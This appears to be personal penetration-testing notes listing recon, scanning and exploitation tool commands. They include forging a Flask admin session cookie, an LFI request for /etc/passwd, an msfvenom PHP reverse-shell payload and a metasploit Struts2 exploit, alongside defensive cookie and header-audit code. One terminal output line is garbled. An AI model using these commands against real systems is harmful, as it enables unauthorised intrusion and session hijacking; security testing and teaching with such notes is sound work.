# Brief

## Tools

### Curl

Command-line HTTP client for sending requests and inspecting responses.

e.g.:

```
curl -X POST -H "Content-Type: application/json" -d 'data' 'url'
```

-X sets the ***HTTP method*** to use\
-H adds an ***HTTP header*** (quote it so the shell passes name and value as one argument)\
\- `"Content-Type: application/json"` tells the server that the data being sent in the request body is in JSON format.\
-d specifies the request body ***data*** (lowercase; uppercase `-D` is a different option that dumps the response headers to a file)

### Gobuster

DNS/Dir enumeration tool

e.g.:

```
gobuster dir -u 'url' -w 'wordlist'
```

dir/dns selects the mode: subdirectory (`dir`) or subdomain (`dns`) enumeration, each driven by the wordlist\
-u specify the target URL (in `dns` mode the target is given with `-d domain` instead)\
-w specify the wordlist

### Wget

CLI tool for downloading files (or whole sites) from the web.

e.g.:

```
wget -mpEk http://example.com
```

`-m` (Mirror)

* This option enables **mirroring mode**.
* It is equivalent to using `-r -N -l inf --no-remove-listing`.

**What it does**:

* Recursively downloads the entire website (`-r`).
* Keeps the timestamps of the downloaded files (`-N`).
* Sets the recursion depth to infinite (`-l inf`).
* Preserves the directory structure of the website.

`-p` (Page Requisites)

* This option tells `wget` to download all files necessary to display the webpage correctly.

**What it does**:

* Downloads images, CSS, JavaScript, and other resources linked to the webpage.
* Ensures the mirrored website looks and functions like the original.

`-E` (Adjust Extensions)

* This option adjusts the file extensions of downloaded files.

**What it does**:

* Adds `.html` to files that are HTML but don’t have an extension.
* Ensures that HTML files are properly recognized by browsers.

`-k` (Convert Links)

* This option converts links in the downloaded files to make them work locally.

**What it does**:

* Updates absolute URLs (e.g., `http://example.com/page.html`) to relative paths (e.g., `page.html`).
* Ensures that the mirrored website works offline without requiring an internet connection.

> \[!NOTE]\
> This will:
>
> 1. Download the entire website (`http://example.com`).
> 2. Save it to a local directory named `example.com`.
> 3. Ensure the website works offline by converting links and downloading all necessary resources.

### Flask-Unsign

Decodes, brute-forces the secret of, and re-signs Flask session cookies.

```
┌──(kali㉿kali)-[~/Desktop/rough]
└─$ flask-unsign -u -c "eyJ2ZXJ5X2F1dGgiOiJ3YWZlciJ9.Z9WSDg.6i5-bXRGi3l8qzzi9IhtouRGPKk" --no-literal-eval -w name.txt
[*] Session decodes to: {'very_auth': 'wafer'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 28 attemptscadamia
b'peanut butter'

┌──(kali㉿kali)-[~/Desktop/rough]
└─$ flask-unsign -s -c "{'very_auth':'admin'}" -S 'peanut butter'
eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.Z9WS4g.yICKFWtn5VA05DLkCIMZeJImq-o
```

`-u` unsign (decode a cookie and, with `-w`, recover its secret)\
`-c` cookie value\
`--no-literal-eval`:\
1\. When decoding a session cookie, Flask-Unsign uses `literal_eval` to safely convert the decoded string into a Python object (e.g., a dictionary).\
2\. The `--no-literal-eval` option tells Flask-Unsign **not to use `literal_eval`** when decoding the session cookie.\
3\. Instead, it treats the decoded data as a raw string without attempting to convert it into a Python object.\
`-w` wordlist\
`-s` sign\
`-S` secret
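To see what flask-unsign is actually working with, here is an added example (not part of the original notes and not flask-unsign's own code) that rebuilds Flask's default session-cookie format with the standard library only: a base64url JSON payload, a base64url timestamp, and an HMAC-SHA1 over both, keyed with HMAC-SHA1(secret_key, "cookie-session"). The two cookies and the secret `peanut butter` come from the terminal session above; the function names and the assumption of Flask's default settings (SHA1, salt `cookie-session`, compact JSON separators) are this example's own. The payload decodes without any key, which is why session contents are readable to anyone holding the cookie, and the secret key is the only thing standing between a user and a re-signed session: it must be long and random, never a word that a wordlist run finds in 28 attempts.

```python
"""Flask session cookies without Flask: decode, verify and sign (stdlib only).

Added example, not part of the original notes and not flask-unsign's code.
Reproduces Flask's default SecureCookieSessionInterface format, i.e. an
itsdangerous URLSafeTimedSerializer with salt "cookie-session", SHA1 and
"hmac" key derivation (assumed defaults; a custom digest or salt would differ):

    base64url(json) . base64url(timestamp) . base64url(HMAC-SHA1(derived_key, first two parts))
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"  # Flask's default salt for session cookies

# Cookies and secret taken from the flask-unsign session in the notes above.
PAGE_COOKIE = "eyJ2ZXJ5X2F1dGgiOiJ3YWZlciJ9.Z9WSDg.6i5-bXRGi3l8qzzi9IhtouRGPKk"
PAGE_SIGNED_COOKIE = "eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.Z9WS4g.yICKFWtn5VA05DLkCIMZeJImq-o"
PAGE_SECRET = "peanut butter"


def _b64e(data: bytes) -> str:
    """base64url without padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _derive_key(secret_key: str) -> bytes:
    """itsdangerous 'hmac' key derivation: HMAC-SHA1(secret, salt)."""
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def decode_payload(cookie: str) -> dict:
    """Read the session data. No key is needed: the payload is only encoded,
    so never store secrets in a Flask session."""
    compressed = cookie.startswith(".")  # itsdangerous prefixes zlib-compressed payloads with '.'
    body = cookie[1:] if compressed else cookie
    raw = _b64d(body.split(".")[0])
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def decode_timestamp(cookie: str) -> int:
    """Signing time as Unix seconds (big-endian integer in the middle segment)."""
    return int.from_bytes(_b64d(cookie.rsplit(".", 2)[1]), "big")


def sign(session: dict, secret_key: str, timestamp: Optional[int] = None) -> str:
    """Build a cookie the way Flask does. JSON separators must be compact or the
    payload bytes, and therefore the signature, will not match Flask's."""
    payload = _b64e(json.dumps(session, separators=(",", ":")).encode())
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    value = f"{payload}.{ts_b64}"
    sig = hmac.new(_derive_key(secret_key), value.encode(), hashlib.sha1).digest()
    return f"{value}.{_b64e(sig)}"


def verify(cookie: str, secret_key: str, max_age: Optional[int] = None,
           now: Optional[int] = None) -> Optional[dict]:
    """Return the session dict if the signature (and optionally the age) checks
    out, else None. Constant-time comparison, as itsdangerous does."""
    value, _, sig_b64 = cookie.rpartition(".")
    expected = hmac.new(_derive_key(secret_key), value.encode(), hashlib.sha1).digest()
    if not hmac.compare_digest(expected, _b64d(sig_b64)):
        return None
    if max_age is not None:
        current = int(time.time()) if now is None else now
        if current - decode_timestamp(cookie) > max_age:
            return None
    return decode_payload(cookie)


if __name__ == "__main__":
    print("payload without key:", decode_payload(PAGE_COOKIE), decode_timestamp(PAGE_COOKIE))
    print("right key:", verify(PAGE_COOKIE, PAGE_SECRET), "wrong key:", verify(PAGE_COOKIE, "wrong-key"))
    # Same input as the `flask-unsign -s` line above, pinned to that run's timestamp.
    print(sign({"very_auth": "admin"}, PAGE_SECRET, timestamp=1742050018) == PAGE_SIGNED_COOKIE)
```

Setting `max_age` on `verify()` corresponds to Flask's `PERMANENT_SESSION_LIFETIME` check; without it a cookie signed under a leaked key stays valid until the key is rotated, which is the real fix once a secret has been recovered.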

Other tools:\
Nuclei\
Sublist3r\
httpx\
JSLinkFinder

### subdomain enum

subfinder (queries public sources such as SSL certificates, APIs and search engines)

```
subfinder -d target.com -o subdomain.txt
```

assetfinder (sources such as certificate search via CertSpotter, HackerTarget and Facebook certificate transparency logs)

```
assetfinder --subs-only target.com >> subdomains.txt
```

amass (gathers data from OSINT sources)

```
amass enum -passive -d target.com -o subdomain.txt
```

### Port scanning

nmap

```
nmap -p- --open -sV -sC -T4 -oN nmap_results.txt target.com
```

masscan - **BEST TOOL**

```
masscan -p1-65535 --rate 10000 -oL masscan_results.txt target.com
```

### Automating screenshot capture

eyewitness

```
eyewitness -f subdomains.txt --web
```

aquatone

```
cat subdomains.txt | aquatone -out screenshots/
```

### Directory bruteforce

ffuf\
gobuster

### Automating JS

linkfinder (extracts hidden endpoints, API URLs and JS files from a script)

```
python3 linkfinder.py -i https://target.com/scripts.js -o results.html
```

GF (API key extraction with the `apikeys` pattern set)

```
cat js_files.txt | gf apikeys > secrets.txt
```

### Automating parameter discovery

Discovered parameters are where XSS, open redirects, IDOR and SQLi are typically found.

paramspider (extracts GET parameters from a target website)

```
python3 paramspider.py -d target.com --level high -o params.txt
```

arjun (parameter discovery for API endpoints by brute-forcing GET and POST parameter names)

```
arjun -u https://target.com/api -m GET -o params.json
```

### Automate XSS Detection

dalfox

```
cat params.txt | dalfox pipe -o xss_results.txt
```

xsstrike

```
python3 xsstrike.py -u "https://target.com/index.php?search=query"
```

### Automate SQLi

sqlmap

```
sqlmap -u "https://target.com/index.php?id=1" --dbs --batch --random-agent
```

### Automate SSRF

Gopherus (generates gopher:// payloads; the protocol carries raw TCP data, which is why an SSRF that can speak it reaches Redis, MySQL and other internal services)

```
python3 gopherus.py
```

Interactsh (out-of-band interaction server)

```
interactsh-client -v
```

### Automating LFI/RFI

lfisuite

```
python3 lfisuite.py -u "https://target.com/index.php?file=../../../etc/passwd"
```

fimap

```
fimap -u "https://target.com/index.php?file=test"
```

### Automating open redirect

Oralyzer

```
python3 oralyzer.py -l urls.txt -p payloads.txt
```

### Automating sec headers check

Security headers protect a site against XSS, clickjacking and data injection.

nikto (checks for vulnerabilities and misconfigurations)

```
nikto -h target.com
```

httpx (prints status code, title and Server header per host)

```
httpx -u target.com -sc -title -server -o headers.txt
```
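As an added example (not from the notes and not httpx's or nikto's code), here is a small Python audit that does offline what the httpx line above collects: it parses a raw HTTP response and reports which protective headers are missing or weakly configured, plus the version-leaking Server header that `-server` surfaces. Both responses are constructed for the example; the header names and thresholds (a one-year HSTS `max-age`, `nosniff`, `frame-ancestors`/`X-Frame-Options`, `Secure`/`HttpOnly` on cookies) are the commonly recommended ones, not values from the page.

```python
"""Audit the security headers of a raw HTTP response (stdlib only).

Added example, not from the original notes and not httpx's or nikto's code.
Parses a captured response and reports protective headers that are missing
or weakly set. Thresholds follow common guidance (one-year HSTS max-age).
"""
from typing import Dict, List, Tuple

# Constructed sample responses (not real captures): a weak one and a hardened one.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.29 (Ubuntu)\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "Strict-Transport-Security: max-age=60\r\n"
    "Set-Cookie: session=abc; Path=/\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
    "Strict-Transport-Security: max-age=63072000; includeSubDomains\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Referrer-Policy: no-referrer\r\n"
    "Set-Cookie: session=abc; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)

ONE_YEAR = 31536000  # seconds; the usual minimum recommended HSTS max-age


def parse_response(raw: str) -> Tuple[int, Dict[str, List[str]]]:
    """Return (status_code, headers); names are lower-cased and repeated
    headers such as Set-Cookie are kept as a list."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def hsts_max_age(value: str) -> int:
    """Extract max-age from a Strict-Transport-Security value (0 if absent)."""
    for directive in value.split(";"):
        directive = directive.strip().lower()
        if directive.startswith("max-age="):
            return int(directive.split("=", 1)[1].strip('"') or 0)
    return 0


def audit_headers(raw: str) -> List[str]:
    """Return findings as strings; an empty list means nothing to report."""
    _, h = parse_response(raw)
    findings: List[str] = []

    def first(name: str) -> str:
        return h.get(name, [""])[0]

    csp = first("content-security-policy")
    if not csp:
        findings.append("missing Content-Security-Policy")
    if "frame-ancestors" not in csp and "x-frame-options" not in h:
        findings.append("no clickjacking protection (CSP frame-ancestors or X-Frame-Options)")

    hsts = first("strict-transport-security")
    if not hsts:
        findings.append("missing Strict-Transport-Security")
    elif hsts_max_age(hsts) < ONE_YEAR:
        findings.append(f"HSTS max-age too short ({hsts_max_age(hsts)}s, want >= {ONE_YEAR})")

    if first("x-content-type-options").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")
    if "referrer-policy" not in h:
        findings.append("missing Referrer-Policy")

    # Cookie flags: Secure keeps it off plaintext HTTP, HttpOnly keeps it from script.
    for cookie in h.get("set-cookie", []):
        name = cookie.split("=", 1)[0]
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {name} lacks Secure")
        if "httponly" not in attrs:
            findings.append(f"cookie {name} lacks HttpOnly")

    # A version string in Server: is information disclosure worth removing.
    server = first("server")
    if any(ch.isdigit() for ch in server):
        findings.append(f"Server header reveals version: {server}")
    return findings


if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_headers(resp) or ["ok"])
```

Feed it the raw output of `curl -i` or a proxy capture per host; the findings list is the remediation ticket, and the hardened response shows what a clean result looks like.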

### Automating API recon

kiterunner

```
kiterunner -u http://target.com -w wordlists/apis.txt
```

### Automating content discovery

gau

```
gau target.com | tee urls.txt
```

waybackurls

```
waybackurls target.com > wayback.txt
```

### Automating S3 bucket enum

AWSBucketDump

```
python3 AWSBucketDump.py -l target-buckets.txt -D
```

### Automating CMS enum

CMSeeK

```
python3 cmseek.py -u target.com
```

### Automating WAF (WebApp firewall) Detection

wafw00f

```
wafw00f https://target.com
```

### Automating Information Disclosure

Recovers an exposed `.git` directory from a web server.

GitDumper

```
python3 GitDumper.py https://target.com/.git /output-folder/
```

### Automating REVSHELL

msfvenom

```
msfvenom -p php/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f raw > shell.php
```

### Automating mass exploitation

metasploit (exploit framework)

```
msfconsole
use exploit/multi/http/struts2_namespace_ognl
```

